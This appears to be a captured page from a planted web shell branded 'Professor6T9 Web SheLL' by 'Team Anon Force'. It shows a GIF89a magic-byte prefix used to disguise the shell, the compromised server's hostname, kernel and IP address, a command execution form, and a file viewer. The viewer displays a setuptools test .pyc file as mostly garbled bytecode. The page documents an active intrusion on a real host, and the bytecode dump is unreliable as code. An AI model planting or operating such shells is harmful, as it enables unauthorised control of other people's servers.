GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux host69.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
Apache
68.65.123.79
/
opt
/
cloudlinux
/
venv
/
lib
/
python3.11
/
site-packages
/
setuptools
/
tests
/
__pycache__
[ HOME ]
Exec
Submit
File Name : test_editable_install.cpython-311.pyc
� ,|oi{� � �l � d dl mZ d dlZd dlZd dlZd dlZd dlZd dlmZ d dl m Z d dlmZ d dl mZ d dlmZ d dlmZ d d lmZ d d lmZ d dlZd dlZd dlZd dlmZ d dlmZ d dl m!Z!m"Z"m#Z#m$Z$m%Z%m&Z&m'Z'm(Z( d d l)m*Z* d dl+m,Z, d dl-m.Z. ddl/m0Z0m1Z1 d dl2m3Z3 ej4 ddg�� � d� � � Z5 ed� � ed� � �6 � � ddd ed� � ed� � ddd �id!�Z7d"Z8ej9 �: ej d#k d$�%� � ej9 �; d&i e7�d'e8i�e7g� � d(� � � � � Z<d)� Z=d*� Z> G d+� d,� � Z? G d-� d.� � Z@d/� ZA G d0� d1� � ZBd2� ZC G d3� d4� � ZD G d5� d6� � ZEej9 �F d7� � d8� � � ZGej9 jH d9� � � ZI G d:� d;� � ZJ G d<� d=� � ZK G d>� d?� � ZLd@� ZMej9 �F dA� � dB� � � ZNdC� ZOdD� ZPdE� ZQdOdK�ZRdPdN�ZSdS )Q� )�annotationsN)�deepcopy)� import_module)�EXTENSION_SUFFIXES)�Path)�dedent)�Any)�Mock)�uuid4)� resources)�_encode_pth�_find_namespaces�_find_package_roots�_find_virtual_namespaces�_finder_template� _LinkTree�_TopLevelFinder�editable_wheel)�Distribution)� Extension)�SetuptoolsDeprecationWarning� )�contexts� namespaces)� run_setup�strict�lenient)�paramsc �$ � | j dk rddgS g S )Nr �--config-settings�editable-mode=strict)�param)�requests �x/builddir/build/BUILD/cloudlinux-venv-1.0.10/venv/lib/python3.11/site-packages/setuptools/tests/test_editable_install.py� editable_optsr% * s � ��}�� � �#�%;�<�<� �I� a� [build-system] requires = ["setuptools"] build-backend = "setuptools.build_meta" [project] name = "mypkg" version = "3.14159" license = {text = "MIT"} description = "This is a Python package" dynamic = ["readme"] classifiers = [ "Development Status :: 5 - Production/Stable", "Intended Audience :: Developers" ] urls = {Homepage = "https://github.com"} [tool.setuptools] package-dir = {"" = "src"} packages = {find = {where = ["src"]}} license-files = ["LICENSE*"] [tool.setuptools.dynamic] readme = {file = "README.rst"} [tool.distutils.egg_info] tag-build = ".post0" zr global-include *.py *.txt global-exclude *.py[cod] prune dist prune build zThis is a ``README``z!---- placeholder MIT license ----�mypkga import sys from importlib.metadata import PackageNotFoundError, version try: __version__ = version(__name__) except PackageNotFoundError: __version__ = "unknown" a from importlib.resources import read_text from . import __version__, __name__ as parent from .mod import x data = read_text(parent, "data.txt") print(__version__, data, x) zx = ''zHello World)�__init__.pyz__main__.py�mod.pyzdata.txt)�pyproject.toml�MANIFEST.inz README.rstzLICENSE.txt�srcz __import__('setuptools').setup()�darwin�pypa/setuptools#4328��reason�files�setup.pyc � � | dz }|� � � t j � ||�� � ddddddt |� � g|�}t |� |� � � � g d �}|� |� � � � � d k sJ �|dz � dd �� � |dz � dd �� � |� |� � � � � dk sJ �d S )Nr'